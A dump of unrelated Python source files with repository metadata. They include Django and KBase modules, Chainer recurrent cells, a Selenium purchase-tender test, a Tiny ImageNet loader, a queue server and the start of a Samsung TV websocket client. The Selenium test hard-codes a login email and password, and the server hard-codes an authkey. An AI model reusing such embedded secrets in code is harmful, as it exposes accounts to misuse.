#-*-coding: utf-8 -*-
from django import template
from django.core import urlresolvers
from django.contrib.contenttypes.models import ContentType
register = template.Library()
class EditListNode(template.Node):
    """Template node that resolves a model instance from the context and
    renders the URL of its Django-admin change page."""
    def __init__(self, value):
        self.var = template.Variable(value)
    def render(self, context):
        var = self.var.resolve(context)
        # Derive the admin URL name ("admin:<app>_<model>_change") from the
        # object's content type, then reverse it with the object's pk.
        ctype = ContentType.objects.get_for_model(type(var))
        link = u'admin:%s_%s_change' % (ctype.app_label, ctype.model)
        return urlresolvers.reverse(link, args=(var.id,))
@register.tag
def edit_list(parser, token):
    """Template tag ``{% edit_list obj %}``: emit the admin change URL for *obj*."""
    pieces = token.split_contents()
    if len(pieces) != 2:
        msg = u'Тег %r требует один аргумент' % pieces[0]
        raise template.TemplateSyntaxError(msg)
    tag_name, value = pieces
    return EditListNode(value)
|
[
"godetskiy@ya.ru"
] |
godetskiy@ya.ru
|
ce2ce7dc2c0f952870f86143e1a519cfa7a22b93
|
2825a2d056db418a3bf04d8d2ffc7133cd552d0f
|
/jsondiff/mountpoint.py
|
b2b2f60d5cdfca5d072f5297f75289d5d311cb15
|
[] |
no_license
|
trendsnet/jsondiff
|
eabba41a2c9111d2a2aefdb460564fcc7f1743b8
|
dce2af96542cb986dd1bd927972faf8c505364d9
|
refs/heads/master
| 2020-05-30T04:57:37.713001
| 2017-05-08T07:41:22
| 2017-05-08T07:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
#coding:utf-8
__author__ = 'Feng Lu'
from .views.diff import diff
# Handler mount table: each entry pairs a view callable with the URL path it
# serves. Presumably consumed by the app's router at startup — TODO confirm.
MOUNT_POINTS = ((diff, "/diff"),
(diff, "/"),
)
|
[
"liyanjie8@wanda.cn"
] |
liyanjie8@wanda.cn
|
b768abfeda8056001f6bd64fe0e1e40d66c85e89
|
c7bb49430a2651955e545c3ae4907e870a7f2568
|
/patterns/Observer/observer.py
|
504ceae4e97e41bceceda740bb0b9bffbce54681
|
[] |
no_license
|
jvrcavalcanti/Algorithms
|
133dd29d985c41560b212ed1b204d8220bd89bc9
|
d83f8e61d959e9da970d6270b373eaea39701927
|
refs/heads/master
| 2020-12-31T22:34:25.696750
| 2020-06-16T18:25:58
| 2020-06-16T18:25:58
| 239,056,779
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 116
|
py
|
from abc import ABC, abstractmethod
class Observer(ABC):
    """Observer interface: subclasses receive state updates via handle().

    BUG FIX: the file imports ABC but the class did not inherit it, so
    @abstractmethod had no effect — subclasses could silently omit handle()
    and Observer itself was instantiable. Inheriting ABC enforces the
    contract.
    """
    @abstractmethod
    def handle(self, state):
        """Process a state update pushed by the subject."""
        pass
|
[
"jonnyvictor01@gmail.com"
] |
jonnyvictor01@gmail.com
|
2b6516b8357caff161af954e665fc30dd6a1ad1e
|
8bb6e8535c12c541866ad87fbd221750c7dac127
|
/lib/kb_irep/kb_irepImpl.py
|
0794129841b97942c4a676c5bd19fb284a692a7c
|
[
"MIT"
] |
permissive
|
jungbluth/kb_irep
|
1a0caa793133ec587a0cf8b8de4154c2bb5c82aa
|
55c8f2bfb3ccba74d3418dec31acf6d9630b1ac5
|
refs/heads/master
| 2021-07-18T06:00:00.508236
| 2020-12-30T20:26:15
| 2020-12-30T20:26:15
| 227,967,740
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,768
|
py
|
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
from installed_clients.KBaseReportClient import KBaseReport
#END_HEADER
class kb_irep:
    '''
    Module Name:
    kb_irep
    Module Description:
    A KBase module: kb_irep
    '''
    ######## WARNING FOR GEVENT USERS ####### noqa
    # Since asynchronous IO can lead to methods - even the same method -
    # interrupting each other, you must be *very* careful when using global
    # state. A method could easily clobber the state set by another while
    # the latter method is running.
    ######################################### noqa
    VERSION = "0.0.1"
    GIT_URL = "https://github.com/jungbluth/kb_irep"
    GIT_COMMIT_HASH = "27849324019fb7eeabff2796e9e33115d976f459"
    #BEGIN_CLASS_HEADER
    #END_CLASS_HEADER
    # config contains contents of config file in a hash or None if it couldn't
    # be found
    def __init__(self, config):
        #BEGIN_CONSTRUCTOR
        # Callback URL points at the SDK callback server for service calls.
        self.callback_url = os.environ['SDK_CALLBACK_URL']
        self.shared_folder = config['scratch']
        logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
                            level=logging.INFO)
        #END_CONSTRUCTOR
        pass
    def run_kb_irep(self, ctx, params):
        """
        This example function accepts any number of parameters and returns results in a KBaseReport
        :param params: instance of mapping from String to unspecified object
        :returns: instance of type "ReportResults" -> structure: parameter
           "report_name" of String, parameter "report_ref" of String
        """
        # ctx is the context object
        # return variables are: output
        #BEGIN run_kb_irep
        # Create a minimal report that just echoes params['parameter_1'].
        report = KBaseReport(self.callback_url)
        report_info = report.create({'report': {'objects_created':[],
                                                'text_message': params['parameter_1']},
                                                'workspace_name': params['workspace_name']})
        output = {
            'report_name': report_info['name'],
            'report_ref': report_info['ref'],
        }
        #END run_kb_irep
        # At some point might do deeper type checking...
        if not isinstance(output, dict):
            raise ValueError('Method run_kb_irep return value ' +
                             'output is not type dict as required.')
        # return the results
        return [output]
    def status(self, ctx):
        #BEGIN_STATUS
        # Standard KBase health-check payload.
        returnVal = {'state': "OK",
                     'message': "",
                     'version': self.VERSION,
                     'git_url': self.GIT_URL,
                     'git_commit_hash': self.GIT_COMMIT_HASH}
        #END_STATUS
        return [returnVal]
|
[
"jungbluth.sean@gmail.com"
] |
jungbluth.sean@gmail.com
|
5d911f4022457d7e47942adf723047dc59cefa2f
|
4a5f3b26fca176a80ca8eca796bc646bb225b017
|
/attentive-reader-2/sgu.py
|
8ddc21a3a0732b54672764fcd0003dcc2dec4e7a
|
[] |
no_license
|
musyoku/NLP
|
9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e
|
9b040bb960b65fb2a1c330adafa6c52e3284a0c1
|
refs/heads/master
| 2021-01-21T04:53:57.029200
| 2016-07-10T17:08:03
| 2016-07-10T17:08:03
| 55,848,677
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,107
|
py
|
import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
    """Piecewise-linear ("hard") sigmoid: clip(0.2 * x + 0.5, 0, 1)."""
    linear_part = x * 0.2 + 0.5
    return clip.clip(linear_part, 0.0, 1.0)
class SGU(link.Chain):
    """Stateless Simple Gated Unit recurrent cell.

    Presumably the SGU of the "Deep Gate Recurrent Neural Network" family —
    TODO confirm the exact reference.
    """
    def __init__(self, in_size, out_size):
        super(SGU, self).__init__(
            W_xh=linear.Linear(in_size, out_size),
            W_zxh=linear.Linear(out_size, out_size),
            W_xz=linear.Linear(in_size, out_size),
            W_hz=linear.Linear(out_size, out_size),
        )
    def __call__(self, h, x):
        """Compute the next hidden state from previous state *h* and input *x*."""
        x_g = self.W_xh(x)
        z_g = tanh.tanh(self.W_zxh(x_g * h))
        z_out = softplus.softplus(z_g * h)
        # Update gate blends the old state with the candidate output.
        z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
        h_t = (1 - z_t) * h + z_t * z_out
        return h_t
class StatefulSGU(SGU):
    """SGU cell that caches its hidden state between calls."""
    def __init__(self, in_size, out_size):
        super(StatefulSGU, self).__init__(in_size, out_size)
        self.state_size = out_size
        self.reset_state()
    def to_cpu(self):
        # Move both the parameters and the cached hidden state.
        super(StatefulSGU, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
    def to_gpu(self, device=None):
        super(StatefulSGU, self).to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)
    def set_state(self, h):
        assert isinstance(h, chainer.Variable)
        h_ = h
        # Force the supplied state onto the device this link currently uses.
        if self.xp == numpy:
            h_.to_cpu()
        else:
            h_.to_gpu()
        self.h = h_
    def reset_state(self):
        # Next __call__ starts from an implicit zero state.
        self.h = None
    def __call__(self, x):
        if self.h is None:
            # First step: evaluate the cell as if the previous state were zero.
            xp = cuda.get_array_module(x)
            zero = variable.Variable(xp.zeros_like(x.data))
            z_out = softplus.softplus(zero)
            z_t = hard_sigmoid(self.W_xz(x))
            h_t = z_t * z_out
        else:
            h_t = SGU.__call__(self, self.h, x)
        self.h = h_t
        return h_t
class DSGU(link.Chain):
    """Stateless Deep SGU cell: like SGU but with a sigmoid output gate (W_go)."""
    def __init__(self, in_size, out_size):
        super(DSGU, self).__init__(
            W_xh=linear.Linear(in_size, out_size),
            W_zxh=linear.Linear(out_size, out_size),
            W_go=linear.Linear(out_size, out_size),
            W_xz=linear.Linear(in_size, out_size),
            W_hz=linear.Linear(out_size, out_size),
        )
    def __call__(self, h, x):
        """Compute the next hidden state from previous state *h* and input *x*."""
        x_g = self.W_xh(x)
        z_g = tanh.tanh(self.W_zxh(x_g * h))
        # Extra learned output gate distinguishes DSGU from plain SGU.
        z_out = sigmoid.sigmoid(self.W_go(z_g * h))
        z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
        h_t = (1 - z_t) * h + z_t * z_out
        return h_t
class StatefulDSGU(DSGU):
    """DSGU cell that caches its hidden state between calls."""
    def __init__(self, in_size, out_size):
        super(StatefulDSGU, self).__init__(in_size, out_size)
        self.state_size = out_size
        self.reset_state()
    def to_cpu(self):
        # Move both the parameters and the cached hidden state.
        super(StatefulDSGU, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()
    def to_gpu(self, device=None):
        super(StatefulDSGU, self).to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)
    def set_state(self, h):
        assert isinstance(h, chainer.Variable)
        h_ = h
        # Force the supplied state onto the device this link currently uses.
        if self.xp == numpy:
            h_.to_cpu()
        else:
            h_.to_gpu()
        self.h = h_
    def reset_state(self):
        # Next __call__ starts from an implicit zero state.
        self.h = None
    def __call__(self, x):
        if self.h is None:
            # First step shortcut: with h == 0 the candidate gate output is
            # taken to be 0.5. NOTE(review): this equals sigmoid(W_go(0)) only
            # while W_go's bias is zero — diverges from the general path once
            # the bias trains; confirm intended.
            z_t = hard_sigmoid(self.W_xz(x))
            h_t = z_t * 0.5
        else:
            h_t = DSGU.__call__(self, self.h, x)
        self.h = h_t
        return h_t
|
[
"musyoku@users.noreply.github.com"
] |
musyoku@users.noreply.github.com
|
90ab9fd8dbaf028130901ea8dc146e64dc36e060
|
8270ee8435d2c95dcc9f0e8f9f2119a45cafdf34
|
/authentication/authentication/urls.py
|
62d83125245dc2239a6a24bc1a945d75afe0e38f
|
[] |
no_license
|
venkatapriya2020/Django_Hands_On
|
d8fa20124181f8ed59aaea91f2c3ebfec45495b6
|
28bd9d6fd95730c8f85c40c0d284d2d7cb3fe462
|
refs/heads/master
| 2023-02-04T05:19:42.708484
| 2020-12-20T22:32:28
| 2020-12-20T22:32:28
| 323,177,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""authentication URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
    path("",include("users.urls")),  # root URLs handled by the users app
    path('admin/', admin.site.urls),  # Django admin site
]
|
[
"venkatapriya@live.com"
] |
venkatapriya@live.com
|
e41f7a4ee3dff131d8b4f169176cf7ead839fc16
|
8af82d8482761aa99f6db95527a20c8854c00fdb
|
/PT_Approve.py
|
e951714fc9aff612626a16950f2f94ad0101e9a3
|
[] |
no_license
|
vandy1992/SCM-Automation
|
62c02f665dcf42e79459f7aec575f07e35720c81
|
38c4266b943ece80df66ea32ba22f774a46df6c6
|
refs/heads/master
| 2022-11-20T13:15:56.572776
| 2020-07-10T09:05:47
| 2020-07-10T09:05:47
| 278,587,474
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,805
|
py
|
import unittest
# import HtmlTestRunner
import time
import allure
from allure_commons.types import AttachmentType
from selenium import webdriver
import sys
sys.path.append("C://Users/Vandana Mallaiah/PycharmProjects/loginpage") #run through cmd and to generate report we need this or else no need
from pages.purchase_tender_page import Purchase_Tender
#https://clever-brahmagupta-0d6b23.netlify.app
class purchase_tender_Test(unittest.TestCase):
    """End-to-end Selenium flow: log in to the SCM site, create a purchase
    tender, send it for approval, approve it, inspect the list view and
    finally delete the entry. Screenshots are attached to the Allure report
    at each major step."""
    baseURL="https://testscm.digicollect.com/"
    email ="manager@testdigibar.com"      # NOTE(review): duplicated as literals in test_Purchase_tender — confirm which is authoritative
    password ="testdigibar123"
    # driver = webdriver.Firefox(executable_path="E:\geckodriver-v0.26.0-win64\geckodriver.exe")
    driver = webdriver.Chrome(executable_path="E:\chromedriver_win32\chromedriver.exe")
    prno="DIGICOLLECT1234"  # purchase requisition number fixture
    Bran="Test Digibar"     # branch name fixture
    trno="vandy@@K654"      # tender number fixture
    @classmethod
    def setUpClass(cls):
        # One browser session is shared by the whole test class.
        cls.driver.get(cls.baseURL)
        cls.driver.maximize_window()
    def test_Purchase_tender(self):
        pt=Purchase_Tender(self.driver)
        time.sleep(3)
        allure.attach(self.driver.get_screenshot_as_png(), name="loginpage", attachment_type=AttachmentType.PNG)
        pt.login_page("manager@testdigibar.com","testdigibar123")
        time.sleep(5)
        allure.attach(self.driver.get_screenshot_as_png(), name="homepage", attachment_type=AttachmentType.PNG)
        # Fill in the tender creation form.
        pt.click_create_new()
        time.sleep(3)
        pt.click_foreign()
        time.sleep(3)
        pt.click_tr_no(self.trno)
        pt.click_pr_no()
        pt.click_branch()
        pt.click_dept()
        pt.click_Attention()
        pt.click_date()
        pt.click_currency()
        pt.click_authorised()
        pt.click_phone()
        # pt.click_address()
        # pt.click_Save()
        pt.click_same_as_billing()
        pt.click_product()
        pt.other_info()
        # pt.file_attach()
        pt.click_saveandsend()
        allure.attach(self.driver.get_screenshot_as_png(), name="sendapproval", attachment_type=AttachmentType.PNG)
        # Approval workflow: send, approve, confirm.
        pt.approval()
        pt.click_send()
        pt.click_approve()
        pt.enter_note()
        pt.click_yes()
        pt.click_List()
        allure.attach(self.driver.get_screenshot_as_png(), name="listview", attachment_type=AttachmentType.PNG)
        pt.click_single()
        # pt.click_approved()
        pt.click_view_attach()
        allure.attach(self.driver.get_screenshot_as_png(), name="viewattach", attachment_type=AttachmentType.PNG)
        pt.click_close()
        # Clean up: delete the tender just created.
        pt.click_single()
        pt.click_list_delete()
        allure.attach(self.driver.get_screenshot_as_png(), name="delete", attachment_type=AttachmentType.PNG)
# Allow running this suite directly: `python PT_Approve.py`.
if __name__=='__main__':
    unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
bdf356f1b24561547e82750dcf298ac1a820f9f4
|
f53ebcc05ccc8892c32fc2b5c121ba0d78451adb
|
/classify_images.py
|
a0f79e4a9fbf09917707b7f53e0b97d22a0ea8eb
|
[] |
no_license
|
XDUNZC/TBtianchi_submit
|
4a45e1096fa389ea9123647e7caaa7cb52a9c322
|
e6b1497c0063379f34f9e8cab4926fb160944fdd
|
refs/heads/master
| 2023-08-15T19:45:07.112471
| 2020-04-12T06:56:57
| 2020-04-12T06:56:57
| 249,676,498
| 0
| 0
| null | 2023-07-23T09:42:19
| 2020-03-24T10:20:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,010
|
py
|
from read_dataset import Reader
from save import Saver
from model.Resnet50.run import Worker as MatchWorker
from model.mmdetection_coco import run as DetectionWorker
import utils
import os
import mmcv
import random
class Classifier():
    """Run the detector over every commodity image, bucket commodities by
    detected class label, and prune each commodity's image list down to a
    couple of representative images that actually contain a top label.
    """
    def __init__(self,classify_model,reader):
        self.classify_model = classify_model
        self.reader = reader
        # label id (0..22) -> set of commodity indices observed with that label
        self.class2commoditys = {i:set() for i in range(23)}
        # image path -> (boxes over threshold, labels over threshold)
        self.img_boxes_label_result = {}
        self._classify_image()
    def _classify_image(self):
        print('开始检测所有商品图,并进行分类剪枝:')
        # 为了加速debug 只剪枝前1000个商品图
        for commodity in mmcv.track_iter_progress(self.reader.commodity_index_list):
            labels_in_this_commodity = {i:0 for i in range(23)}
            imgs_in_this_commodity = list(self.reader.commodity_index2img_path_list[commodity])
            for img in imgs_in_this_commodity:
                result_over_thr, labels_over_thr, _ = DetectionWorker.get_result_and_feats(self.classify_model, img)
                self.img_boxes_label_result[img] = (result_over_thr, labels_over_thr)
                for label in labels_over_thr:
                    labels_in_this_commodity[label]+=1
            # Two most frequent labels for this commodity: list of (label, count).
            labels_in_this_commodity_list = sorted(labels_in_this_commodity.items(), key=lambda x: x[1], reverse=True)[:2]
            # Collect the labels we actually keep (a second label with zero
            # occurrences is dropped) and register the commodity under them.
            top_labels = []
            for i,item in enumerate(labels_in_this_commodity_list):
                label, appear_num = item
                if i!=0 and appear_num==0:
                    break
                top_labels.append(label)
                self.class2commoditys[label].add(commodity)
            # Keep up to two representative images containing a top label.
            # BUG FIX: the original tested `(label, count) tuples in
            # labels_over_thr`, which can never match a list of bare labels,
            # so present_imgs was always empty and every commodity lost all
            # of its images. Compare labels to labels instead.
            present_imgs = []
            random.shuffle(imgs_in_this_commodity)
            for img in imgs_in_this_commodity:
                result_over_thr, labels_over_thr = self.img_boxes_label_result[img]
                if any(label in labels_over_thr for label in top_labels):
                    present_imgs.append(img)
                if len(present_imgs) == 2 : # 控制选择几幅图
                    break
            self.reader.commodity_index2img_path_list[commodity] = present_imgs
    def show_classify_result(self):
        """Print which commodities were registered under each class label."""
        for label,commoditys in self.class2commoditys.items():
            print('lable: ',label,' commoditys: ',commoditys)
def main():
    """Wire together the dataset reader, result saver, detection model and
    classifier, then run the classification/pruning pass."""
    # Initialize the class that resolves dataset file paths.
    reader = Reader(test_dataset_path='tcdata/',
                    img_path='tcdata/test_dataset_3w/image/',
                    video_path='tcdata/test_dataset_3w/video/')
    print("success init reader")
    # Initialize the result saver.
    saver = Saver()
    print("success init saver")
    # Matching stage (currently disabled).
    """初始化匹配模型"""
    # TODO 替换参数
    # match_worker = MatchWorker(model_path='./model/Resnet50/models/model-inter-500001.pt')
    print("success load match model")
    """初始化获得框模型"""
    # idx selects the detector config/checkpoint pair below.
    idx = 0
    # NOTE(review): the config list has 4 entries but the checkpoint list only
    # 2, and entries past index 0 are bare filenames — only idx == 0 is usable.
    config_file = ['./model/mmdetection_coco/configs/tbtc_fater_rcnn_voc.py',
                   'tbtc_retinanet_voc.py', 'tbtc_feature_exteactor_faster_rcnn.py',
                   'tbtc_feature_exteactor_faster_rcnn.py'][idx]
    checkpoint_file = ['./model/mmdetection_coco/checkpoints/faster_rcnn_x101_64x4d_fpn_1x20200324-ba5926a5.pth',
                       'retinanet_x101_64x4d_fpn_1x20200322-53c08bb4.pth'][idx]
    # TODO 替换参数
    coco_model = DetectionWorker.get_model(config_file=config_file,
                                           checkpoint_file=checkpoint_file)
    print("success load detection model")
    """逐个视频运行"""
    classifier = Classifier(coco_model,reader)
    print("success build classifier")
    # Debug output of the classification result; comment out for submission.
    classifier.show_classify_result()
if __name__ == "__main__":
# success run
print("successful open run.py")
main()
# end run
print("successful end test.py")
|
[
"903244773@qq.com"
] |
903244773@qq.com
|
b215c554ca3a503adec1ad978c11a8f6d483768c
|
2d71efd7d8eecd057ba1705ae61bef03358b7605
|
/heating/common.py
|
4fa33355fe10a9902743eddfea3219bcf3a5bd75
|
[] |
no_license
|
graememorgan/smart-thermostat
|
9a35765b32b324e907eab76ee36e645ac77d2711
|
7b2294de8d0752f9518f50541a1f2b42610bcb26
|
refs/heads/master
| 2021-01-10T10:52:36.556316
| 2016-02-04T13:30:02
| 2016-02-04T13:30:02
| 50,459,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
import datetime
def epoch(date):
return (date - datetime.datetime(1970, 1, 1)).total_seconds()
|
[
"mail@graeme.io"
] |
mail@graeme.io
|
fe57a510beaf39e45c60b51b452a5c31026ab28d
|
3ecce3646d66033d214db3749be63e78d4f663e9
|
/Assignment 4/load_utils.py
|
9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22
|
[
"Apache-2.0"
] |
permissive
|
pradyumnakr/EIP-3.0
|
f36aaed042d65beef163b08dbb0de05139e3fee7
|
67bc5168b169406d7567f3d1d3b9b35fc7dd61af
|
refs/heads/master
| 2022-01-27T15:23:00.013031
| 2019-07-28T17:25:35
| 2019-07-28T17:25:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,699
|
py
|
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
    """Load the Tiny ImageNet-200 dataset from *path*.

    Reads the wnid/word metadata, the train/val/test image folders and
    (when present) the test annotations. Grayscale images are expanded to
    a single channel; when ``subtract_mean`` is True the training-set mean
    image is subtracted from every split.

    Returns a dict with class_names, X_train/y_train, X_val/y_val,
    X_test/y_test (y_test may be None) and mean_image.

    BUG FIX: the returned dict literal listed the 'class_names' key twice;
    the duplicate has been removed (the value was identical, but the first
    entry was dead code and the duplication invites divergence).
    """
    # First load wnids
    with open(os.path.join(path, 'wnids.txt'), 'r') as f:
        wnids = [x.strip() for x in f]
    # Map wnids to integer labels
    wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
    # Use words.txt to get names for each class
    with open(os.path.join(path, 'words.txt'), 'r') as f:
        wnid_to_words = dict(line.split('\t') for line in f)
        for wnid, words in wnid_to_words.items():
            wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
    class_names = [wnid_to_words[wnid] for wnid in wnids]
    # Next load training data.
    X_train = []
    y_train = []
    for i, wnid in enumerate(wnids):
        if (i + 1) % 20 == 0:
            print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
        # To figure out the filenames we need to open the boxes file
        boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
        with open(boxes_file, 'r') as f:
            filenames = [x.split('\t')[0] for x in f]
        num_images = len(filenames)
        X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
        y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
        for j, img_file in enumerate(filenames):
            img_file = os.path.join(path, 'train', wnid, 'images', img_file)
            img = imread(img_file)
            if img.ndim == 2:
                ## grayscale file: give it an explicit single channel
                img.shape = (64, 64, 1)
            X_train_block[j] = img.transpose(1, 0, 2)
        X_train.append(X_train_block)
        y_train.append(y_train_block)
    # We need to concatenate all training data
    X_train = np.concatenate(X_train, axis=0)
    y_train = np.concatenate(y_train, axis=0)
    # Next load validation data
    with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
        img_files = []
        val_wnids = []
        for line in f:
            img_file, wnid = line.split('\t')[:2]
            img_files.append(img_file)
            val_wnids.append(wnid)
        num_val = len(img_files)
        y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
        X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
        for i, img_file in enumerate(img_files):
            img_file = os.path.join(path, 'val', 'images', img_file)
            img = imread(img_file)
            if img.ndim == 2:
                img.shape = (64, 64, 1)
            X_val[i] = img.transpose(1, 0, 2)
    # Next load test images
    # Students won't have test labels, so we need to iterate over files in the
    # images directory.
    img_files = os.listdir(os.path.join(path, 'test', 'images'))
    X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'test', 'images', img_file)
        img = imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_test[i] = img.transpose(1, 0, 2)
    y_test = None
    y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
    if os.path.isfile(y_test_file):
        with open(y_test_file, 'r') as f:
            img_file_to_wnid = {}
            for line in f:
                line = line.split('\t')
                img_file_to_wnid[line[0]] = line[1]
        y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
        y_test = np.array(y_test)
    mean_image = X_train.mean(axis=0)
    if subtract_mean:
        X_train -= mean_image[None]
        X_val -= mean_image[None]
        X_test -= mean_image[None]
    return {
      'class_names': class_names,
      'X_train': X_train,
      'y_train': y_train,
      'X_val': X_val,
      'y_val': y_val,
      'X_test': X_test,
      'y_test': y_test,
      'mean_image': mean_image,
    }
# Hard-coded Colab path; presumably run after extracting tiny-imagenet-200
# into /content — TODO confirm the expected environment.
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
|
[
"vishal114186@gmail.com"
] |
vishal114186@gmail.com
|
2908f0e3db2a300277114b39d46d25d3ea5e1012
|
2d3976964d8923a1e91e31af702bd68fbf37d474
|
/runTask/server.py
|
1bd36c0754e0d042ad090870e35b568521b7c88d
|
[] |
no_license
|
barry800414/master_thesis
|
2f6900fb2964891849dadef9283ed6e7f11cc696
|
01a0cac30ab63fcf818f1f43959634094b624af5
|
refs/heads/master
| 2020-05-29T08:53:32.810702
| 2016-06-04T02:03:52
| 2016-06-04T02:03:52
| 38,382,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
#!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
    # Port may be overridden on the command line: ./server.py [port]
    port = 3333
    if len(sys.argv) == 2:
        port = int(sys.argv[1])
    q = queue.Queue()
    # The manager proxies access to q, so concurrent remote clients are safe.
    class QueueManager(BaseManager):
        pass
    # Expose the shared queue to remote workers under the name 'get_queue'.
    QueueManager.register('get_queue', callable = lambda: q)
    m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
    s = m.get_server()
    print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
    # Blocks forever serving queue requests.
    s.serve_forever()
|
[
"barry800414@gmail.com"
] |
barry800414@gmail.com
|
89a610ca7cd1c5022c19cb112a2eab06b5bf334a
|
e9b06f7b8b210c550879c1e8c484b42719ccd633
|
/custom_components/samsungtv_smart/api/samsungws.py
|
be8b20e1dd6ee7b4498cd6934fd4be4cf43f6dcf
|
[] |
no_license
|
eplantequebec/Home-Assistant-Config
|
a5b69d3e2fa21068dc15b20a8988a24440140300
|
ed05566ee476ec4490efa9b9d5bfdf55fca9a808
|
refs/heads/master
| 2021-08-17T00:11:15.805600
| 2021-07-18T23:40:23
| 2021-07-18T23:40:23
| 201,519,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,202
|
py
|
"""
SamsungTVWS - Samsung Smart TV WS API wrapper
Copyright (C) 2019 Xchwarze
Copyright (C) 2020 Ollo69
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import base64
import json
import logging
import re
import requests
import ssl
import subprocess
import sys
import time
import uuid
import websocket
from datetime import datetime
from enum import Enum
from threading import Thread, Lock
from yarl import URL
from . import exceptions
from . import shortcuts
PING_MATCHER = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)\/(?P<mdev>\d+.\d+)"
)
PING_MATCHER_BUSYBOX = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)"
)
WIN32_PING_MATCHER = re.compile(r"(?P<min>\d+)ms.+(?P<max>\d+)ms.+(?P<avg>\d+)ms")
MIN_APP_SCAN_INTERVAL = 10
MAX_WS_PING_INTERVAL = 10
TYPE_DEEP_LINK = "DEEP_LINK"
TYPE_NATIVE_LAUNCH = "NATIVE_LAUNCH"
_LOGGING = logging.getLogger(__name__)
def gen_uuid():
return str(uuid.uuid4())
class App:
def __init__(self, app_id, app_name, app_type):
self.app_id = app_id
self.app_name = app_name
self.app_type = app_type
class ArtModeStatus(Enum):
Unsupported = 0
Unavailable = 1
Off = 2
On = 3
class Ping:
"""The Class for handling the data retrieval."""
def __init__(self, host, count):
"""Initialize the data object."""
self._ip_address = host
self._count = count
self.available = False
if sys.platform == "win32":
self._ping_cmd = [
"ping",
"-n",
str(self._count),
"-w",
"2000",
self._ip_address,
]
else:
self._ping_cmd = [
"ping",
"-n",
"-q",
"-c",
str(self._count),
"-W2",
self._ip_address,
]
def ping(self):
"""Send ICMP echo request and return details if success."""
pinger = subprocess.Popen(
self._ping_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
try:
out = pinger.communicate()
_LOGGING.debug("Output is %s", str(out))
if sys.platform == "win32":
match = WIN32_PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
elif "max/" not in str(out):
match = PING_MATCHER_BUSYBOX.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
else:
match = PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max, rtt_mdev = match.groups()
return True
except (subprocess.CalledProcessError, AttributeError):
return False
class SamsungTVWS:
